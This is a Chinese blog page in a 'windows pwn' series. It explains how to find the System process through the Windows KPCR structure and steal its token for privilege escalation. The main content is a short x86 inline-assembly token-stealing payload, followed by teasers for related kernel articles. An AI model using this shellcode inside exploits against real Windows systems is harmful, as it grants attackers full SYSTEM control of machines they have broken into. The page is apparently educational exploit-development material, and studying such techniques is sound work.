通过kpcr 找到system 进程的地址

最新推荐文章于 2023-05-08 09:53:07 发布
最新推荐文章于 2023-05-08 09:53:07 发布
阅读量589 收藏
点赞数
分类专栏: windows pwn 文章标签: 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_37921080/article/details/82635106
版权
本文介绍了一种通过kpcr结构找到system进程,并替换其token来实现提权的技术。首先,从fs段获取kpcr,接着找到CurrentThread结构,进一步得到当前线程的kprocess。然后遍历进程链表定位到PID为4的system进程,最后将system进程的token复制到当前进程,完成提权操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

    __asm {
        pushad
        int 3
        mov eax, fs:[0x124]
        mov ebx, [eax + 0x50]
        mov eax, 4
        mov ecx, ebx

        SEARCH:
        mov ecx, [ecx + 0xb8]
        sub ecx, 0xb8
        cmp eax, [ecx + 0xb4]
        jnz SEARCH
        mov eax, [ecx + 0xf8]
        mov [ebx + 0xf8], eax

        popad
最低0.47元/天 解锁文章
《格蠹汇编》读书笔记—windbg的使用
u012138730的专栏
05-25 5553
1.注册表设置 注册表设置 要调试的exe的 debugger 为 x86的windbg 打开注册表,在[运行] (win+ R)中输入 regedit,找到下面这个路径: 比如想要调试test.exe, 就新建一个test.exe 文件夹,并新建 一个 字符串值的键,名称为 Debugger,值为 windbg所在的路径 2.打开windbg,需要设置这三个路径,但是这个...
操作系统的内核基地址
weixin_33724046的博客
11-05 554
操作系统的内核模块根据处理器的个数和是否支持PAE(Physical Address Extension物理地址扩展)分为以下四种 ntoskrnl.exe ---Uniprocessor单处理器,不支持PAE ntkrnlpa.exe ---Uniprocessor单处理器,支持PAE ntkrnlmp.exe ---Multiprocess...
如何得知SYSTEM进程里哪一个具体的进程占用了过多CPU?
weixin_30813225的博客
03-11 225
http://superuser.com/questions/527401/high-cpu-usage-by-the-system-process 在工作中,查看哪个进程占用过多CPU或内存不是那么简单的事,可能很多进程都依附于SYSTEM或是SVCHOST.EXE。 那么,如何进一步查看呢? 被微软收购的Process Explorer.就派上用场了。 Download and...
KPCR
stonesharp的专栏
11-08 4051
由于Windows需要支持多个CPU, 因此Windows内核中为此定义了一套以处理器控制区(Processor Control Region)即KPCR为枢纽的数据结构, 使每个CPU都有个KPCR. 其中KPCR这个结构中有一个域KPRCB(Kernel Processor Control Block)结构, 这个结构扩展了KPCR. 这两个结构用来保存与线程切换相关的全局信息.  通常fs
如何获得system和bin/sh的地址
Sakura给爷pwn全场
09-13 1285
如何获得system和bin/sh的地址
Linux system 内存寻址
leo.wang 技术专栏
11-26 859
翻阅《深入理解linux内核》之内存寻址章节,写此文章,作为总结。 X86架构,关于地址类型有3个重要概念:        逻辑地址(logical address)        每个逻辑地址由一个段地址和偏移量组成,偏移量指实际地址相对于段首的偏移。即logical addr = segment addr + offset        线性地址(linear addr
linux内核--进程调度(一)
鱼思故渊的专栏
09-29 9941
引言:无论是在批处理系统还是分时系统中,用户进程数一般都多于处理机数、这将导致它们互相争夺处理机。另外,系统进程也同样需要使用处理机。这就要求进程调度程序按一定的策略,动态地把处理机分配给处于就绪队列中的某一个进程,以使之执行。   进程调度的具体功能可总结为如下几点:     作为进程调度的准备,进程管理模块必须将系统中各进程的执行情况和状态特征记录在各进程的PCB表中。并且,根据各
内核,任意地址写任意数据/固定数据模型
zhuhuibeishadiao
05-14 4949
实验环境 xp sp3 此实验将一个不常用的内核函数置0,然后R3申请了0地址的指针,将shellcode拷到此内存,内核并没有做ProbeForRead /Write检查 直接对传入的数据进行了修改,造成了任意地址写任意数据漏洞 ,了R3程序为system限 R3代码 主要获得一个函数的地址,将函数地址传入R0  R0将此函数地址置0,然后R3申请了一个0地址,将shel
PEB和SPEB的推导
最新发布
05-25
PEB(Process Environment Block)和SPEB(System Process Environment Block)都是Windows操作系统中的数据结构,用于存储进程或系统进程的运行环境信息。它们的推导如下: 首先,PEB和SPEB都是由KPCR(Kernel ...
Linux System 内核地址空间布局
leo.wang 技术专栏
11-27 1052
内核态地址空间        0x00000000~0xBFFFFFFF 属于用户态空间,大小共3G; 0xC0000000~0xFFFFFFFF是内核态空间,大小共1G; 内存管理区        ZONE_DMA:   包含低于16MB的内存页框。 因为ISA总线的DMA控制器只能对低16MB寻址        ZONE_NORMAL:包含高于16MB到低于896MB的内存
进程线程001 进程线程结构体和KPCR
鬼手的博客
12-26 1508
文章目录前言EPROCESSKPROCESS主要成员EPROCESS其他成员ETHREADKTHREAD主要成员介绍ETHREAD其他成员介绍KPCRKPCR介绍_NT_TIB主要成员介绍KPCR的其他成员介绍KPRCB成员介绍KPRCB成员介绍 前言 进程线程的知识点很多,如果我们想了解问题的本质,就要从一些关键的结构体学起,先来介绍一个与进程密切相关的结构体 EPROCESS 每个进程在零环都...
Windows内核解析之KPCR结构体和FS:[0]
bcbobo21cn的专栏
01-28 786
Windows内核解析之KPCR结构体和FS:[0];
Windows内核基础之KPCR
tutucoo
12-07 1361
1.概述 KPCR是CPU的一个结构体,它就像EPROCESS对于进程,ETHREAD对于线程,KPCR对于CPU是非常重要的,它的全称是Processor Control Region。 fs:[0]在3环时指向TEB,在0环时指向KPCR,每一个CPU核心都对应着一个KPCRKPCR存储了CPU需要使用的一些重要信息,比如GDT\IDT以及线程相关的信息 2.KPCR结构体 nt!_KPCR...
KPCR学习
kernweak的博客
09-03 1895
KPCR:CPU控制区(Processor Control Region) KPCR介绍 KPCR相当于一个副本,存储着线程相关的一些重要信息,这样CPU在处理时就不用查线程了。 1) 当线程进入0环时,FS:[0]指向KPCR(3环时FS:[0] -> TEB) 2) 每个CPU都有一个KPCR结构体(一个核一个) 3) KPCR中存储了CPU本身要用的一些重要数据:GDT、...
函数简介篇——进程创建函数:system()
weixin_42645653的博客
11-28 1694
说明:   本文章旨在总结备份、方便以后查询,由于是个人总结,如有不对,欢迎指正;另外,内容大部分来自网络、书籍、和各类手册,如若侵请告知,马上删帖致歉。   QQ 群 号:513683159 【相互学习】 内容来源:   《Linux系统编程》、《Linux网络编程》 ...
KPCR进程.md
leeham的博客
10-07 726
KPCR进程 KPCR KPCR1 KPCR2 (Kernel) Processor Control Region a KPCR for each logical processor KPCR is the means through which the kernel manages them(processors). 由于Windows需要支持多个CPU, 因此Windows内核中为此定义了...
01 EPROCESS、ETHREAD、KPCR结构
qq_50242229的博客
05-08 536
每个windows进程在0环都有一个对应的结构体:EPROCESS,这个结构体包含了进程所有重要的信息。
_KPCR&_KPRCB
weixin_45678798的博客
07-31 921
Windows 内核有个特殊的基本要求,当CPU运行在内核上时,FS会指向一个名为KPCR的结构体。从一个CPU 的KPCR 结构出发,可以直接或间接地找到与该CPU 有关的许多信息
3.KPCR
史D芬周
02-26 311
3.KPCR KPCR: CPU控制区(Processor Control Region) 当线程进入0环时, FS:[0]指向KPCR(3环时FS[0]-> TEB)每个CPU都有一个KPCR结构体(一个核一个)KPCR中存储了CPU本身要用的一些重要数据: GDT, IDT以及线程相关的一些信息。在winbbg中查看KPCR结构体 ...
Matlab工具箱:应用于NIR光谱分析的MLR、PCA、PLS、KPCR技术
工具箱中包含了多种统计和化学计量方法,其中包括多元线性回归(MLR)、主成分分析(PCA)、偏最小二乘回归(PLS)和K近邻主成分回归(KPCR)。这些方法在近红外光谱(NIR)分析中非常有用,可以帮助研究人员和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值